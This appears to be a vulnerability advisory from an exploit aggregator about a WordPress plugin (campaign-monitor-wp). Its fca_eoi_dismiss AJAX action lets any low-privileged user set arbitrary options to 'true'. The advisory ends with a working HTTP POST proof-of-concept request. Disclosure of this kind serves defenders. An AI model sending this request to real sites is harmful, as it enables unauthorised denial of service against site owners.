## https://sploitus.com/exploit?id=WPEX-ID:3167A83C-291E-4372-A42E-D842205BA722
Once the site gets at least 25 conversions using the plugin, a notice will show up on the administration panel, to all logged-in users regardless of their roles.
By clicking on "Dismiss" button the `fca_eoi_dismiss` AJAX Action is invoked with two parameters: `nonce` and `option`.
The `option` parameter is not sanitized before used in this line of code:
```
# campaign-monitor-wp/includes/eoi-post-types.php
1938โ if ( update_option( $option, 'true' ) ) {
```
Since there are no additional privilege checks in the AJAX action's callback function, this means an attacker with Subscriber+ role can actually set any WordPress options with the value `true`.
The possibility to use only the `true` value limits the possibility to perform standard attacks like modifying site URL, default role for new users, and so on, but it is easy to use to create a denial of service by overwriting plugins'/themes' or WordPress' own options.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: <YOUR AUTHOR+ COOKIES>
action=fca_eoi_dismiss&option=<THE OPTION YOU WANT TO SET TO TRUE>&nonce=<YOUR NONCE>